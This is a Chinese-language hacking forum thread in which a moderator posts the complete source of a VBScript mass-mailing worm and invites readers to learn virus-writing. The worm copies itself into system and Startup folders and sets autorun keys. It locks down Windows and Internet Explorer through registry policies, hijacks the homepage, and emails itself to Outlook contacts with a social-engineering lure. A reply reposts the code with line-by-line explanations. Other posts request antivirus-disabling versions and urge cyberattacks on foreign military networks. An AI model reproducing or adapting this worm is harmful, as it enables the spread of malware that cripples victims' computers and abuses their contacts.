=七步之才=
职务:版主
积分:1422
贴数:1286
日期:2002-9-29 18:44:15
我的主页是http://free.3599.com/mona qq:51514957
这是个vbs病毒
想学做病毒,相做病毒的来找我!!!
原码如下:
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32.vbs")
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32","Win32.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","Hello this is jace"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","You should reinstall your syste!!!"
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 50
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网"
Mail.Attachments.Add(dir2&"Win32.vbs")
Mail.Send
Next
ol.Quit
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://free.3599.com/mona"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
=心无二用=
积分:775
贴数:157
日期: 2002-9-30 9:58:05 大家给点意见啊!呵呵!
人品问题
=化零为整=
积分:24
贴数:29
日期: 2002-10-1 0:34:24 你真历害,但我真的看不出来,不过你仍是我的心中偶人像
=化零为整=
积分:3
贴数:3
日期: 2005-10-10 12:38:32 天才!!!!!
=入木三分=
积分:1215
贴数:1106
日期: 2005-10-15 19:11:47 全是你做的吗?(怀疑)???????????????
=化零为整=
积分:14
贴数:24
日期: 2005-10-18 17:24:31 能不能写个牛鼻点的阿
我要看啊
最好可以关闭杀毒软件的
修改注册表原来是这样写啊 #24(大话表情)
#89谢谢我们伟大的版主
版主万岁 亲
=化零为整=
积分:20
贴数:17
日期: 2006-2-15 1:51:12 我麻了..读不懂啊...
=化零为整=
积分:34
贴数:33
日期: 2006-2-15 11:41:51 有无搞错呀,鬼唔知系用vbs病毒制机整+
=化零为整=
积分:11
贴数:10
日期: 2006-2-16 18:26:43 写的不错吗
=化零为整=
积分:21
贴数:18
日期: 2006-2-17 1:01:43 On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")
//分别复制病毒到windows/winnt,system/system32,启动菜单下
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" //禁止“运行”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD" //禁止“关闭系统”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives",63000000,"REG_DWORD" //隐藏盘符
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools",1,"REG_DWORD" //禁止使用注册表编辑器
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry","" //禁止注册表扫描
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD" //禁止“注销”菜单
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD" //禁止进入MS-DOS实模式
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","Win32system.vbs" // 运行这个病毒拉(开机自动运行)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD" //禁止显示桌面所有图标(就是桌面上什么都没拉,只看见蓝天^_^)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD" //这个大概是禁止进入MS-DOS模式拉
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskBar",1,"REG_DWORD" //禁止任务栏和开始菜单了
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD" //禁止鼠标右键
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD" //禁止控制面板
r.Regwrite "HKLMSoftwareCLASSES.reg","txtfile" //禁止使用REG文件
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","nihaoa " //这个就是开机提示的标题了
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","nihaoa aa a aa a " //开机提示的内容
Set ol=CreateObject("Outlook.Application") //这个是开始发信了(病毒要传播嘛)
On Error Resume Next
For x=1 To 100 //很明显,是给你的100个好友发信,这个值你可以自定义拉
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="还在忙吗?" //信的标题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 来自Rose的问候!" //信的内容
Mail.Attachments.Add(dir2&"Win32system.vbs") //当他打开信后(当然是附件),这个就进驻他的磁盘了!!!害怕吧
Mail.Send
Next
ol.Quit
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD" //IE的右键被禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD" //Internet选项也禁用拉
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD" // 想“另存为”,没门!!!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD" // 禁用“文件打开”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD" // 禁止更改高级设置
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD" // 临时文件设置也被禁止更改哦
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD" // “自动配置”禁止更改
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD" // 想更改你的主页,算了吧!
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD" // “历史记录设置”也不能更改了
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD" // “Internet连接向导”
r.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.baidu.com" // 这是设置的默认首页
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD" // 禁止安全项,
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD" // 禁止“重置web设置”
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD" // 查看源文件也不行,太毒了吧!~
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD" // 添加脱机页计划 禁用
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD" // 禁止资源管理器中文件菜单(想打开文件也^_^不行)
=化零为整=
积分:6
贴数:6
日期: 2006-2-17 21:04:55 不错哦,继续加油,我看有些地方可以去掉,不过尊重版权,你自己看着办吧!
=八面玲珑=
职务:观察员
积分:1364
贴数:1111
日期: 2006-2-19 9:18:18 待台海战争,或中日战争打响时候,希望大家用自己的技术去攻击日本或台湾还有美国的电脑指挥网络,最终成为解放军的强有力的支持者。
=化零为整=
积分:5
贴数:5
日期: 2006-2-19 21:36:59 高手!!!
=心无二用=
积分:830
贴数:69
日期: 2006-11-24 21:57:09 不错,不过我看它像一个生成器生成的,除了传染模块不好之外,其它模块(特指破坏部分)写的不错
=入木三分=
积分:1287
贴数:1861
日期: 2007-1-18 21:18:55 痛苦,我一打開就提示我說有病毒,我日這殺毒軟件太強悍。。。
=化零为整=
积分:21
贴数:21
日期: 2007-2-7 17:18:01 呵呵 不错哦 支持一下
IE不断爆出漏洞,使用FireFox浏览器,会更安全一些: